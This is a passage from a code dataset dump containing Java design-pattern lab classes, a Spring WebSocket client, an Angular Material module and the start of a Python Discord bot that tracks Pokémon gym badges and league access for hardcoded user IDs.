gifts;\r\n\r\n public GiftPack(Gift... gifts) {\r\n this.gifts = gifts;\r\n }\r\n\r\n public Gift[] getGifts() {\r\n return gifts;\r\n }\r\n\r\n @Override\r\n public Gift clone() throws CloneNotSupportedException {\r\n Gift[] gifts = new Gift[this.gifts.length];\r\n for (int i = 0; i < gifts.length; i++)\r\n gifts[i] = this.gifts[i].clone();\r\n GiftPack copy = (GiftPack) super.clone();\r\n copy.gifts = gifts;\r\n return copy;\r\n }\r\n\r\n @Override\r\n public void accept(GiftVisitor v) {\r\n v.visit(this);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5565438270568848, "alphanum_fraction": 0.5705209374427795, "avg_line_length": 19.86111068725586, "blob_id": "0a4912326a89c794f5477994d8e221ea0538bd34", "content_id": "633655d69ca28e63460a56e61f792a75bbe743f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 787, "license_type": "no_license", "max_line_length": 101, "num_lines": 36, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab3/task1/CarModel.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab3.task1;\r\n\r\n/**\r\n * Created by grego on 07.04.2017.\r\n */\r\npublic class CarModel implements Gift {\r\n private final String name;\r\n private boolean isBroken;\r\n\r\n public CarModel(String name) {\r\n this.name = name;\r\n }\r\n\r\n public void crush() {\r\n isBroken = true;\r\n }\r\n\r\n public void move() {\r\n System.out.println(isBroken ? \"Broken car can't move =\\\\\" : \"Car \" + name + \" model moves!\");\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return name + \" car model\";\r\n }\r\n\r\n @Override\r\n public Gift clone() throws CloneNotSupportedException {\r\n return (CarModel) super.clone();\r\n }\r\n\r\n @Override\r\n public void accept(GiftVisitor v) {\r\n v.visit(this);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.787696897983551, "alphanum_fraction": 0.787696897983551, "avg_line_length": 37.08571243286133, "blob_id": "ef0b7c1ca7ff3c8ed1d29675eb1b05098baabce0", "content_id": "d09fdac57eeb54e086246bcde721cccab4b087d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1333, "license_type": "no_license", "max_line_length": 102, "num_lines": 35, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/consult/impl/ConsultClient.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.consult.impl;\n\nimport io.github.k_gregory.insurance.service.consult.ConsultCollegaue;\nimport io.github.k_gregory.insurance.service.consult.ConsultMediator;\nimport io.github.k_gregory.insurance.service.consult.data.FreeClientListNotification;\nimport io.github.k_gregory.insurance.service.consult.data.NewAnswerNotification;\nimport io.github.k_gregory.insurance.service.consult.data.SupportMessage;\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.stereotype.Component;\nimport org.springframework.web.socket.TextMessage;\nimport org.springframework.web.socket.WebSocketSession;\n\n@Component\npublic class ConsultClient extends ConsultCollegaue {\n @Autowired\n protected ConsultClient(ConsultMediator mediator) {\n super(mediator);\n }\n\n @Override\n protected void handleTextMessage(WebSocketSession session, TextMessage message) throws Exception {\n String text = objectMapper.readTree(message.getPayload()).asText();\n mediator.acceptClientQuestion(this, text);\n }\n\n @Override\n public void disconnectFromMediator(ConsultMediator mediator) {\n mediator.disconnectClient(this);\n }\n\n @Override\n public void connectToMediator(ConsultMediator mediator) {\n mediator.connectClient(this);\n }\n}\n" }, { "alpha_fraction": 0.7372262477874756, "alphanum_fraction": 0.7372262477874756, "avg_line_length": 19.549999237060547, "blob_id": "a72ad214fb368b71ed9174b29d11f39f0f2e41d5", "content_id": "5c6ea64ec4e87b0b6a315ff98985a83e3db9e1fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 411, "license_type": "no_license", "max_line_length": 99, "num_lines": 20, "path": "/numerical-methods/src/app/my-material/my-material.module.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { NgModule } from '@angular/core';\n\nimport {\n MatButtonModule,\n MatIconModule,\n MatListModule,\n MatSidenavModule,\n MatTableModule,\n MatToolbarModule\n} from \"@angular/material\";\n\nconst modules = [\n MatButtonModule, MatSidenavModule, MatToolbarModule, MatIconModule, MatListModule, MatTableModule\n];\n\n@NgModule({\n imports: [...modules],\n exports: [...modules]\n})\nexport class MyMaterialModule { }\n" }, { "alpha_fraction": 0.6617472171783447, "alphanum_fraction": 0.6641221642494202, "avg_line_length": 30.944133758544922, "blob_id": "84d959a32b4d76170d8672122bca148134940c49", "content_id": "46bd6f86e8c2eb26700dd432722a7d5ea8f38f14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5895, "license_type": "no_license", "max_line_length": 91, "num_lines": 179, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab1/task1/Task1.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab1.task1;\r\n\r\nimport javafx.application.Application;\r\nimport javafx.collections.FXCollections;\r\nimport javafx.collections.ObservableList;\r\nimport javafx.geometry.Pos;\r\nimport javafx.scene.Scene;\r\nimport javafx.scene.control.Button;\r\nimport javafx.scene.control.ListCell;\r\nimport javafx.scene.control.ListView;\r\nimport javafx.scene.control.TextField;\r\nimport javafx.scene.layout.HBox;\r\nimport javafx.scene.layout.Priority;\r\nimport javafx.scene.layout.VBox;\r\nimport javafx.scene.paint.Color;\r\nimport javafx.scene.text.Font;\r\nimport javafx.scene.text.Text;\r\nimport javafx.stage.Stage;\r\n\r\nimport java.text.DateFormat;\r\nimport java.util.Date;\r\n\r\ninterface MessageDrawer {\r\n void drawMessage(ListCell<Message> cell, Message msg, boolean empty);\r\n}\r\n\r\nclass Message {\r\n final String text;\r\n final Date sentAt;\r\n\r\n public Message(String text, Date sentAt) {\r\n this.text = text;\r\n this.sentAt = sentAt;\r\n }\r\n}\r\n\r\nclass BasicMessageDrawer implements MessageDrawer {\r\n private final Font preferredFont = new Font(\"Times New Roman\", 14);\r\n private final Color preferredColor = Color.BLACK;\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n if (!empty) {\r\n cell.setFont(preferredFont);\r\n cell.setTextFill(preferredColor);\r\n cell.setText(msg.text);\r\n } else {\r\n cell.setText(null);\r\n }\r\n }\r\n}\r\n\r\nabstract class MessageDrawerDecorator implements MessageDrawer {\r\n\r\n private final MessageDrawer messageDrawer;\r\n\r\n public MessageDrawerDecorator(MessageDrawer messageDrawer) {\r\n this.messageDrawer = messageDrawer;\r\n }\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n messageDrawer.drawMessage(cell, msg, empty);\r\n }\r\n}\r\n\r\nclass ColorDecorator extends MessageDrawerDecorator {\r\n private final Color color;\r\n\r\n public ColorDecorator(MessageDrawer messageDrawer, Color color) {\r\n super(messageDrawer);\r\n this.color = color;\r\n }\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n super.drawMessage(cell, msg, empty);\r\n cell.setTextFill(color);\r\n }\r\n}\r\n\r\nclass FontSizeDecorator extends MessageDrawerDecorator {\r\n private final double size;\r\n\r\n public FontSizeDecorator(MessageDrawer messageDrawer, double size) {\r\n super(messageDrawer);\r\n this.size = size;\r\n }\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n super.drawMessage(cell, msg, empty);\r\n cell.setFont(new Font(cell.getFont().getName(), size));\r\n }\r\n}\r\n\r\nclass FontTypeDecorator extends MessageDrawerDecorator {\r\n private final String fontName;\r\n\r\n public FontTypeDecorator(MessageDrawer messageDrawer, String fontName) {\r\n super(messageDrawer);\r\n this.fontName = fontName;\r\n }\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n super.drawMessage(cell, msg, empty);\r\n cell.setFont(new Font(fontName, cell.getFont().getSize()));\r\n }\r\n}\r\n\r\nclass DateAdderDecorator extends MessageDrawerDecorator {\r\n public DateAdderDecorator(MessageDrawer messageDrawer) {\r\n super(messageDrawer);\r\n }\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n super.drawMessage(cell, msg, empty);\r\n if (!empty) {\r\n String date = DateFormat.getDateInstance(DateFormat.SHORT).format(msg.sentAt);\r\n String time = DateFormat.getTimeInstance(DateFormat.MEDIUM).format(msg.sentAt);\r\n VBox dateTime = new VBox(new Text(time), new Text(date));\r\n dateTime.setAlignment(Pos.CENTER);\r\n cell.setGraphic(dateTime);\r\n } else {\r\n cell.setGraphic(null);\r\n }\r\n }\r\n}\r\n\r\n\r\npublic class Task1 extends Application {\r\n private final VBox view = new VBox(5);\r\n private final HBox messageAdder = new HBox(5);\r\n private final TextField messageInput = new TextField(\"Enter your message\");\r\n private final Button messageSendButton = new Button(\"Send!\");\r\n private ObservableList<Message> messages = FXCollections.observableArrayList();\r\n private final ListView<Message> messagesView = new ListView<>(messages);\r\n\r\n @Override\r\n public void start(Stage primaryStage) {\r\n final MessageDrawer messageDrawer = getMessageDrawer();\r\n\r\n messageSendButton.setOnAction(ev -> {\r\n messages.add(new Message(messageInput.getText(), new Date()));\r\n });\r\n\r\n messagesView.setCellFactory(view -> {\r\n return new ListCell<Message>() {\r\n @Override\r\n protected void updateItem(Message msg, boolean empty) {\r\n super.updateItem(msg, empty);\r\n messageDrawer.drawMessage(this, msg, empty);\r\n }\r\n };\r\n });\r\n\r\n view.getChildren().add(messagesView);\r\n view.getChildren().add(messageAdder);\r\n messageAdder.getChildren().add(messageInput);\r\n messageAdder.getChildren().add(messageSendButton);\r\n\r\n messageAdder.setAlignment(Pos.CENTER);\r\n VBox.setVgrow(messagesView, Priority.ALWAYS);\r\n\r\n primaryStage.setScene(new Scene(view));\r\n primaryStage.show();\r\n }\r\n\r\n private MessageDrawer getMessageDrawer() {\r\n MessageDrawer messageDrawer = new BasicMessageDrawer();\r\n messageDrawer = new FontSizeDecorator(messageDrawer, 16);\r\n messageDrawer = new FontTypeDecorator(messageDrawer, \"Verdana\");\r\n messageDrawer = new ColorDecorator(messageDrawer, Color.web(\"#001b7b\"));\r\n messageDrawer = new DateAdderDecorator(messageDrawer);\r\n return messageDrawer;\r\n }\r\n}" } ]
75
Mitohku/fesfjeksbvf-poke
https://github.com/Mitohku/fesfjeksbvf-poke
a6d952fccc3763906f82fb05b8f5bc96e87dfb9f
42033f76ee4c7e76c7f20e15577f827ecbd6df67
0e95d8c52b76e0157d0151fdce082a06325c3f84
refs/heads/master
2020-03-18T10:07:52.917074
2018-06-18T19:56:24
2018-06-18T19:56:24
134,597,945
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4918408691883087, "alphanum_fraction": 0.5687659978866577, "avg_line_length": 44.473358154296875, "blob_id": "a286ab22661216dd67c3f12e8387914062fbcc7e", "content_id": "079bbf988bd57d37d211cf9d1fe8f3676c52eea5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37778, "license_type": "no_license", "max_line_length": 312, "num_lines": 807, "path": "/bot.py", "repo_name": "Mitohku/fesfjeksbvf-poke", "src_encoding": "UTF-8", "text": "import discord\r\nfrom discord.ext import commands\r\nimport asyncio\r\nimport os\r\nimport sys\r\nimport time\r\nimport random\r\nimport datetime as dt\r\nimport datetime\r\nimport json, asyncio\r\nimport copy\r\nimport logging\r\nimport traceback\r\nimport aiohttp\r\nfrom collections import Counter\r\n\r\n\r\ncommand_prefix = \"p!\" #CHANGE IT TO WHAT YOU WANT\r\ndescription = \"Pokéberry🍓\" #ALSO CHANGE THIS\r\nbot = commands.Bot(command_prefix, description = description)\r\nbot.remove_command('help')\r\ntu = datetime.datetime.now()\r\n\r\ngym = [385419569558323202, 307219837648764928, 220231135949619200, 349989345714896906, 247166156467732482, 333204266309255168, 186195192301223936]\r\npewter = []\r\ncerulean = []\r\nvermilion = []\r\nceladon = []\r\nfuschia = []\r\nsaffron = []\r\ncinnabar = []\r\nviridian = []\r\nviolet = [220231135949619200]\r\nazalea = []\r\ngoldenrod = []\r\necruteak = [247166156467732482]\r\ncianwood = []\r\nolivine = [307219837648764928]\r\nmahogany = []\r\nblackthorn = []\r\nlaverre = [385419569558323202]\r\n\r\npewter2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\ncerulean2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nvermilion2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nceladon2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nfuschia2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nsaffron2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\ncinnabar2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nviridian2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nviolet2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nazalea2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\ngoldenrod2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\necruteak2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\ncianwood2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nolivine2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nmahogany2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nblackthorn2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\nlaverre2 = [385419569558323202, 307219837648764928, 332892224738295808]\r\n\r\nelite = [220231135949619200, 247166156467732482, 333204266309255168, 349989345714896906] \r\nelitelead = [385419569558323202] \r\n\r\nstarted = [385419569558323202, 332892224738295808]\r\nmaster = [385419569558323202, 332892224738295808]\r\ncomp = [385419569558323202, 332892224738295808] \r\n\t\r\[email protected]\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(bot.user.name)\r\n print(bot.user.id) \r\n print('------')\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t HELP COMMAND\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['cmds', 'commands'], description = 'Sends a message with commands in DM')\r\nasync def helpme(ctx):\r\n\r\n\tdeveloper = bot.get_user(385419569558323202) # commands.get_user(commands.owner_id)\r\n\r\n\tif developer.avatar_url[54:].startswith('a_'):\r\n\t\tavi = 'https://cdn.discordapp.com/avatars/' + developer.avatar_url[35:-10]\r\n\telse:\r\n\t\tavi = developer.avatar_url\r\n\r\n\tembed = discord.Embed(colour = discord.Colour(0xA522B3))\r\n\tembed.set_thumbnail(url = avi)\r\n\tembed.set_author(name = developer, icon_url = avi)\r\n\tembed.description = f\"Hi everyone! I'm **{developer.name}**, the creator of **Pokéberry🍓** <:bot:453635744960086026> \\nI started making that bot in <:Python:453634265197051934> but I'm also a web designer & designer. \\nI wanted to make this BOT because for each arenas we need to get a badge if we complete it.\"\r\n\tembed.add_field(name=\"Having Issues/Problems?\", value=f\"If you have any problems with **Pokéberry🍓** <:bot:453635744960086026>,\\njust contact the Bot Developper **{developer.name}**\", inline=False)\r\n\r\n\thelp1 = discord.Embed(colour = discord.Colour(0xA522B3))\r\n\thelp1.title = f\"Pokéberry🍓 Commands List\"\r\n\thelp1.description = f\"**Pokéberry🍓** <:bot:453635744960086026>'s prefix is **p!**\\nNeed more informations about a command? `p!help [command]`\\n\\n\"\r\n\thelp1.add_field(name=\"Core Commands\", value=\"`p!helpme`\", inline=False)\r\n\thelp1.add_field(name=\"Utility Commands\", value=\"`p!ping` **|** `p!badges` **|** `p!about` **|** `p!stats` **|** `p!leagueaccess`\", inline=False)\r\n\thelp1.add_field(name=\"Fun Commands\", value=\"`p!snowball`\", inline=False)\r\n\thelp1.set_footer(text = \"Have fun using Pokéberry🍓\")\r\n\r\n\tawait ctx.send(embed = embed)\r\n\tawait ctx.send(embed = help1)\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t OWNER COMMAND\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['creator', 'dev', 'developer'], description = 'Who is my creator?')\r\nasync def owner(ctx):\r\n\r\n\tdeveloper = bot.get_user(385419569558323202) # commands.get_user(commands.owner_id)\r\n\r\n\tif developer.avatar_url[54:].startswith('a_'):\r\n\t\tavi = 'https://cdn.discordapp.com/avatars/' + developer.avatar_url[35:-10]\r\n\telse:\r\n\t\tavi = developer.avatar_url\r\n\r\n\tembed = discord.Embed(colour = discord.Colour(0xA522B3))\r\n\r\n\tembed.set_thumbnail(url = avi)\r\n\tembed.set_author(name = developer, icon_url = avi)\r\n\r\n\tembed.description = f\"Hi everyone! I'm **{developer.name}**, the creator of **Pokéberry🍓** <:bot:453635744960086026> \\nI started making that bot in <:Python:453634265197051934> but I'm also a web designer & designer. \\nI wanted to make this BOT because for each arenas we need to get a badge if we complete it.\"\r\n\r\n\tawait ctx.send(embed = embed)\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t PING COMMAND\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['ping', 'ms'])\r\nasync def latency(ctx):\r\n\tpingms = \"{}\".format(int(ctx.bot.latency * 1000))\r\n\tmessage = await ctx.send(\"Ping - Calculating connection.\")\r\n\tawait message.edit(content = f\"Ping - Calculating connection..\")\r\n\tawait asyncio.sleep(0.50)\r\n\tawait message.edit(content = f\"Ping - Calculating connection...\")\r\n\tawait asyncio.sleep(0.50)\r\n\tawait message.edit(content = f\"Ping - Calculating connection....\")\r\n\tawait asyncio.sleep(0.50)\r\n\tawait message.edit(content = f\"Ping - Calculating connection.\")\r\n\tawait asyncio.sleep(0.50)\r\n\tawait message.edit(content = f\"Ping - Calculating connection..\")\r\n\tawait asyncio.sleep(0.50)\r\n\tawait message.edit(content = f\"Ping - Calculating connection...\")\r\n\tawait asyncio.sleep(1.50)\r\n\tawait message.edit(content = f\"Pong! - My latency is **{pingms}**ms\")\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t GAME GROUP \t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected]()\r\nasync def game(self):\r\n\r\n\tif game == None:\r\n\t\tawait self.send(f\"Please use one of the following settings: `default`, `playing`, `streaming`, `watching`, `listenning` or `clear`\")\r\n\r\[email protected](name = 'playing')\r\nasync def game_playing(self, *, game = None):\r\n\r\n\tif not game:\r\n\t\tawait self.send(f\"Please enter a status message\")\r\n\telse:\r\n\t\tawait self.bot.change_presence(game=discord.Game(name = game))\r\n\t\tawait self.send(f\"**{self.bot.user.name}**'s status succesfully changed to 'Playing **{game}**'\")\r\n\r\[email protected](name = 'streaming')\r\nasync def game_streaming(self, *, game = None):\r\n\r\n\tif not game:\r\n\t\tawait self.send(f\"Please enter a status message\")\r\n\telse:\r\n\t\tawait self.bot.change_presence(game=discord.Game(name = game, url = \"https://www.twitch.tv/spiritprod\", type = 1))\r\n\t\tawait self.send(f\"**{self.bot.user.name}**'s status succesfully changed to 'Streaming **{game}**'\")\r\n\r\[email protected](name = 'listenning')\r\nasync def game_listning(self, *, game = None):\r\n\r\n\tif not game:\r\n\t\tawait self.send(f\"Please enter a status message\")\r\n\telse:\r\n\t\tawait self.bot.change_presence(game=discord.Game(name = game, type = 2))\r\n\t\tawait self.send(f\"**{self.bot.user.name}**'s status succesfully changed to 'Listenning to **{game}**'\")\r\n\r\[email protected](name = 'watching')\r\nasync def game_watching(self, *, game = None):\r\n\r\n\tif not game:\r\n\t\tawait self.send(f\"Please enter a status message\")\r\n\telse:\r\n\t\tawait self.bot.change_presence(game=discord.Game(name = game, type = 3))\r\n\t\tawait self.send(f\"**{self.bot.user.name}**'s status succesfully changed to 'Watching **{game}**'\")\r\n\r\[email protected](name = 'default')\r\nasync def game_default(self):\r\n\r\n\tbot_prefix = \"p!\"\r\n\tserver = self.guild\r\n\r\n\tawait self.send(f\"**{self.bot.user.name}**'s status succesfully changed to 'Default'\")\r\n\r\n\tgames = [f\"Use {bot_prefix}help for help!\", f\"{sum(1 for _ in self.bot.get_all_members())} users\", f\"Give us feedback? Use: {bot_prefix}feedback [message]\"]\r\n\tcurrent_number = 0\r\n\twhile True:\r\n\t\tif current_number == len(games):\r\n\t\t\tcurrent_number = 0\r\n\t\tawait self.bot.change_presence(game=discord.Game(name = games[current_number], url = \"https://www.twitch.tv/spiritprod\", type = 1))\r\n\t\tawait asyncio.sleep(20)\r\n\t\tcurrent_number += 1\r\n\r\[email protected](name = 'clear')\r\nasync def game_clear(self, *, game = None):\r\n\tawait self.bot.change_presence(game=discord.Game(name = None))\r\n\tawait self.send(f\"Cleared the status of **{self.bot.user.name}**\")\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t GYM COMPLETE \t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected]()\r\nasync def complete(ctx, *, member : discord.Member=None):\r\n\r\n\tauthor = ctx.message.author.mention\r\n\tauthor2 = ctx.author\r\n\tmention = member.mention\r\n\r\n\tif not member:\r\n\t\tawait ctx.send(f\"Please **mention** the person who **reached/finished** your gym !\")\r\n\r\n\telse:\r\n\t\tif author2.id in gym:\r\n\t\t\tif author2.id in pewter:\r\n\t\t\t\tpewter2.append(member.id)\r\n\t\t\telif author2.id in cerulean:\r\n\t\t\t\tcerulean2.append(member.id)\r\n\t\t\telif author2.id in vermilion:\r\n\t\t\t\tvermilion2.append(member.id)\r\n\t\t\telif author2.id in celadon:\r\n\t\t\t\tceladon2.append(member.id)\r\n\t\t\telif author2.id in fuschia:\r\n\t\t\t\tfuschia2.append(member.id)\r\n\t\t\telif author2.id in saffron:\r\n\t\t\t\tsaffron2.append(member.id)\r\n\t\t\telif author2.id in cinnabar:\r\n\t\t\t\tcinnabar2.append(member.id)\r\n\t\t\telif author2.id in viridian:\r\n\t\t\t\tviridian2.append(member.id)\r\n\t\t\telif author2.id in violet:\r\n\t\t\t\tviolet2.append(member.id)\r\n\t\t\telif author2.id in azalea:\r\n\t\t\t\tazalea2.append(member.id)\r\n\t\t\telif author2.id in goldenrod:\r\n\t\t\t\tgoldenrod2.append(member.id)\r\n\t\t\telif author2.id in ecruteak:\r\n\t\t\t\tecruteak2.append(member.id)\r\n\t\t\telif author2.id in cianwood:\r\n\t\t\t\tcianwood2.append(member.id)\r\n\t\t\telif author2.id in olivine:\r\n\t\t\t\tolivine2.append(member.id)\r\n\t\t\telif author2.id in mahogany:\r\n\t\t\t\tmahogany2.append(member.id)\r\n\t\t\telif author2.id in blackthorn:\r\n\t\t\t\tblackthorn2.append(member.id)\r\n\t\t\telif author2.id in laverre:\r\n\t\t\t\tlaverre2.append(member.id)\r\n\t\t\telse:\r\n\t\t\t\treturn\r\n\r\n\t\t\tawait ctx.send(f\"{mention} now have your **gym badge** for reaching/finishing your gym!\")\r\n\r\n\t\telse:\r\n\t\t\tawait ctx.send(f\"You aren't a **Gym Leader**, {author} !\")\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t LEAGUE ACCESS \t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['league', 'access', 'la', 'al'])\r\nasync def leagueaccess(ctx, *, member: discord.Member = None):\r\n\r\n\tguild = ctx.guild\r\n\tauthor = ctx.message.author.mention\r\n\tauthor2 = ctx.author\r\n\trole = discord.utils.get(guild.roles, name='League Access')\r\n\r\n\tif author2.id in laverre2:\r\n\t\tstarted.append(author2.id)\r\n\t\tawait author2.add_roles(role)\r\n\t\tawait ctx.send(f\"{author}, you have been given access to enter the League!\")\r\n\r\n###################################################################################\r\n\r\[email protected](aliases = ['master', \"mf\", \"fm\"])\r\nasync def masterfight(ctx, *, member: discord.Member = None):\r\n\r\n\tauthor = ctx.message.author.mention\r\n\tauthor2 = ctx.author\r\n\tchannel = bot.get_channel(449660215298621470)\r\n\r\n\tif author2.id in elitelead:\r\n\t\tmaster.append(member.id)\r\n\t\tawait channel.send(f\"{member.mention} has beaten all **Elite Four** members, they can now fight against the **Elite Master** !\")\r\n\r\n###################################################################################\r\n\r\[email protected](aliases = ['comp', 'leaguec', 'cleague'])\r\nasync def leaguecompleted(ctx, *, member: discord.Member = None):\r\n\r\n\tauthor = ctx.message.author.mention\r\n\tauthor2 = ctx.author\r\n\tchannel = bot.get_channel(449660215298621470)\r\n\r\n\tif author2.id in elitelead:\r\n\t\tcomp.append(member.id)\r\n\t\tawait channel.send(f\"{member.mention} has cleared the **League**! Everyone give them a warm GG!\")\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t BADGES COMMAND \t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['badge', 'profile'])\r\nasync def badges(ctx, *, member: discord.Member = None):\r\n\r\n\te = discord.Embed(colour = discord.Colour(0xA522B3))\r\n\t\r\n\tif member is None:\r\n\t\tmember = ctx.author\r\n\r\n\tif member.avatar_url[54:].startswith('a_'):\r\n\t\tavi = 'https://cdn.discordapp.com/avatars/' + member.avatar_url[35:-10]\r\n\telse:\r\n\t\tavi = member.avatar_url\r\n\r\n\tif avi:\r\n\t\te.set_thumbnail(url = avi)\r\n\t\te.set_author(name = str(member), icon_url = avi)\r\n\telse:\r\n\t\te.set_thumbnail(url = member.default_avatar_url)\r\n\t\te.set_author(name = str(member), icon_url = member.default_avatar_url)\r\n\r\n\tfeatures = \"ㅤㅤ\"\r\n\tfeatures1 = \"ㅤㅤ\"\r\n\tfeatures2 = \"ㅤㅤ\"\r\n\tfeatures3 = \"ㅤㅤ\"\r\n\tfeatures4 = \"ㅤㅤ\"\r\n\tfeatures5 = \"ㅤㅤ\"\r\n\tfeatures6 = \"ㅤㅤ\"\r\n\tfeatures7 = \"ㅤㅤ\"\r\n\tfeatures8 = \"ㅤㅤ\"\r\n\tfeatures9 = \"ㅤㅤ\"\r\n\tfeatures10 = \"ㅤㅤ\"\r\n\tfeatures11 = \"ㅤㅤ\"\r\n\tfeatures12 = \"ㅤㅤ\"\r\n\tfeatures13 = \"ㅤㅤ\"\r\n\tfeatures14 = \"ㅤㅤ\"\r\n\tfeatures15 = \"ㅤㅤ\"\r\n\tfeatures16 = \"ㅤㅤ\"\r\n\tfeatures17 = \"ㅤㅤ\"\r\n\r\n\tif member.id in gym:\r\n\t\tif member.id in elite:\r\n\t\t\tfeatures17 = \"Elite Four\"\r\n\t\telif member.id in elitelead:\r\n\t\t\tfeatures17 = \"Elite Master\"\r\n\t\telse:\r\n\t\t\tif member.id in pewter:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Pewter - Rock)\"\r\n\t\t\telif member.id in cerulean:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Cerulean - Water)\"\r\n\t\t\telif member.id in vermilion:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Vermilion - 